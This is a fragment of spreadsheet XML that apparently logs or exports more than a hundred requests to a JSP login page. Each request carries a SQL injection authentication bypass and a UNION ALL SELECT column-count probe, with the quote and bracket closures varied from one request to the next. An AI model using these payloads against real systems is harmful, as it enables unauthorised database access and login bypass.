    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselectnull,null--and((('dvil'like'dvil</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselectnull,null,null--and((('eixs'like'eixs</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselectnull,null,null,null--and((('mbuu'like'mbuu</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselectnull,null,null,null,null--and((('kooh'like'kooh</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselectnull,null,null,null,null,null--and((('vtty'like'vtty</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselectnull,null,null,null,null,null,null--and((('avte'like'avte</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselectnull,null,null,null,null,null,null,null--and((('fplc'like'fplc</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselectnull,null,null,null,null,null,null,null,null--and((('vvia'like'vvia</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselectnull,null,null,null,null,null,null,null,null,null--and((('jeds'like'jeds</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselectnull--and'msgb'like'msgb</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselectnull,null--and'jytd'like'jytd</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselectnull,null,null--and'ehko'like'ehko</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselectnull,null,null,null--and'qcjv'like'qcjv</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselectnull,null,null,null,null--and'oprt'like'oprt</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselectnull,null,null,null,null,null--and'ynpy'like'ynpy</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselectnull,null,null,null,null,null,null--and'aqlz'like'aqlz</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselectnull,null,null,null,null,null,null,null--and'okjf'like'okjf</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselectnull,null,null,null,null,null,null,null,null--and'dpcg'like'dpcg</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselectnull,null,null,null,null,null,null,null,null,null--and'mpvq'like'mpvq</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselectnull--and("ndou"="ndou</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselectnull,null--and("pkdk"="pkdk</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselectnull,null,null--and("iztq"="iztq</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselectnull,null,null,null--and("qhut"="qhut</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselectnull,null,null,null,null--and("olvc"="olvc</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselectnull,null,null,null,null,null--and("mslg"="mslg</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselectnull,null,null,null,null,null,null--and("zipk"="zipk</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselectnull,null,null,null,null,null,null,null--and("lwyy"="lwyy</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselectnull,null,null,null,null,null,null,null,null--and("edrh"="edrh</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselectnull,null,null,null,null,null,null,null,null,null--and("xzgn"="xzgn</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselectnull--and(("frga"="frga</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselectnull,null--and(("jlvv"="jlvv</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselectnull,null,null--and(("kopq"="kopq</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselectnull,null,null,null--and(("tnyy"="tnyy</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselectnull,null,null,null,null--and(("shsb"="shsb</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselectnull,null,null,null,null,null--and(("htio"="htio</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselectnull,null,null,null,null,null,null--and(("ytkt"="ytkt</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselectnull,null,null,null,null,null,null,null--and(("rvbi"="rvbi</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselectnull,null,null,null,null,null,null,null,null--and(("fuky"="fuky</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselectnull,null,null,null,null,null,null,null,null,null--and(("vxgu"="vxgu</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselectnull--and((("fbhv"="fbhv</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselectnull,null--and((("mnkr"="mnkr</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselectnull,null,null--and((("msak"="msak</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselectnull,null,null,null--and((("bgfw"="bgfw</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselectnull,null,null,null,null--and((("ochj"="ochj</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselectnull,null,null,null,null,null--and((("gmrk"="gmrk</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselectnull,null,null,null,null,null,null--and((("zpnx"="zpnx</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselectnull,null,null,null,null,null,null,null--and((("azcf"="azcf</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselectnull,null,null,null,null,null,null,null,null--and((("hqzq"="hqzq</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselectnull,null,null,null,null,null,null,null,null,null--and((("ibts"="ibts</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselectnull--and"vjyp"="vjyp</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselectnull,null--and"fpum"="fpum</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselectnull,null,null--and"mihr"="mihr</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselectnull,null,null,null--and"mcbg"="mcbg</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselectnull,null,null,null,null--and"smwc"="smwc</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselectnull,null,null,null,null,null--and"ttzu"="ttzu</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselectnull,null,null,null,null,null,null--and"yopz"="yopz</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselectnull,null,null,null,null,null,null,null--and"azic"="azic</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselectnull,null,null,null,null,null,null,null,null--and"wezu"="wezu</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselectnull,null,null,null,null,null,null,null,null,null--and"vhqk"="vhqk</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselectnull--and("fase"like"fase</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselectnull,null--and("qtwm"like"qtwm</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselectnull,null,null--and("etgn"like"etgn</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselectnull,null,null,null--and("jifo"like"jifo</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselectnull,null,null,null,null--and("kztk"like"kztk</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselectnull,null,null,null,null,null--and("yzzv"like"yzzv</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselectnull,null,null,null,null,null,null--and("flof"like"flof</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselectnull,null,null,null,null,null,null,null--and("liop"like"liop</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselectnull,null,null,null,null,null,null,null,null--and("qqit"like"qqit</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselectnull,null,null,null,null,null,null,null,null,null--and("tqrg"like"tqrg</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselectnull--and(("xbgq"like"xbgq</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselectnull,null--and(("oisc"like"oisc</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselectnull,null,null--and(("cgny"like"cgny</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselectnull,null,null,null--and(("yzbs"like"yzbs</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselectnull,null,null,null,null--and(("htjq"like"htjq</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselectnull,null,null,null,null,null--and(("xmch"like"xmch</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselectnull,null,null,null,null,null,null--and(("wiol"like"wiol</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselectnull,null,null,null,null,null,null,null--and(("bghc"like"bghc</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselectnull,null,null,null,null,null,null,null,null--and(("uwtj"like"uwtj</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselectnull,null,null,null,null,null,null,null,null,null--and(("jyvy"like"jyvy</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselectnull--and((("spqm"like"spqm</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselectnull,null--and((("ofwy"like"ofwy</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselectnull,null,null--and((("jhvd"like"jhvd</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselectnull,null,null,null--and((("otgd"like"otgd</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselectnull,null,null,null,null--and((("gguj"like"gguj</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselectnull,null,null,null,null,null--and((("ecya"like"ecya</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselectnull,null,null,null,null,null,null--and((("mipa"like"mipa</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselectnull,null,null,null,null,null,null,null--and((("pqlz"like"pqlz</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselectnull,null,null,null,null,null,null,null,null--and((("npon"like"npon</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselectnull,null,null,null,null,null,null,null,null,null--and((("mstk"like"mstk</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselectnull--and"niru"like"niru</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselectnull,null--and"kbek"like"kbek</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselectnull,null,null--and"ceuo"like"ceuo</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselectnull,null,null,null--and"gshn"like"gshn</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselectnull,null,null,null,null--and"ooxl"like"ooxl</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselectnull,null,null,null,null,null--and"bmoc"like"bmoc</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselectnull,null,null,null,null,null,null--and"byjs"like"byjs</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselectnull,null,null,null,null,null,null,null--and"wzcd"like"wzcd</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselectnull,null,null,null,null,null,null,null,null--and"enfn"like"enfn</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselectnull,null,null,null,null,null,null,null,null,null--and"uhqk"like"uhqk</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect4058--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect5632,5632--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect7336,7336,7336--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect5108,5108,5108,5108--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect6672,6672,6672,6672,6672--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect3530,3530,3530,3530,3530,3530--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect3094,3094,3094,3094,3094,3094,3094--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect8459,8459,8459,8459,8459,8459,8459,8459--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect9081,9081,9081,9081,9081,9081,9081,9081,9081--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect368,368,368,368,368,368,368,368,368,368--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect1415--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect6693,6693--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect6619,6619,6619--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect5997,5997,5997,5997--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect8282,8282,8282,8282,8282--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect9744,9744,9744,9744,9744,9744--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect1987,1987,1987,1987,1987,1987,1987--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect5418,5418,5418,5418,5418,5418,5418,5418--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect2710,2710,2710,2710,2710,2710,2710,2710,2710--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect5895,5895,5895,5895,5895,5895,5895,5895,5895,5895--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect5501--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect2348,2348--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect9311,9311,9311--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect1083,1083,1083,1083--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect3504,3504,3504,3504,3504--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect823,823,823,823,823,823--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect7044,7044,7044,7044,7044,7044,7044--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect3054,3054,3054,3054,3054,3054,3054,3054--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect4501,4501,4501,4501,4501,4501,4501,4501,4501--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect9273,9273,9273,9273,9273,9273,9273,9273,9273,9273--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect8478--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect3124,3124--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect8329,8329,8329--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect2320,2320,2320,2320--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect8811,8811,8811,8811,8811--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect1228,1228,1228,1228,1228,1228--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect2260,2260,2260,2260,2260,2260,2260--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect2960,2960,2960,2960,2960,2960,2960,2960--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect2629,2629,2629,2629,2629,2629,2629,2629,2629--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect1400,1400,1400,1400,1400,1400,1400,1400,1400,1400--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect4726--and(3931=3931</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect768,768--and(4653=4653</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect5769,5769,5769--and(8781=8781</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect6319,6319,6319,6319--and(6427=6427</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect468,468,468,468,468--and(2630=2630</t>
  </si>
  <si>
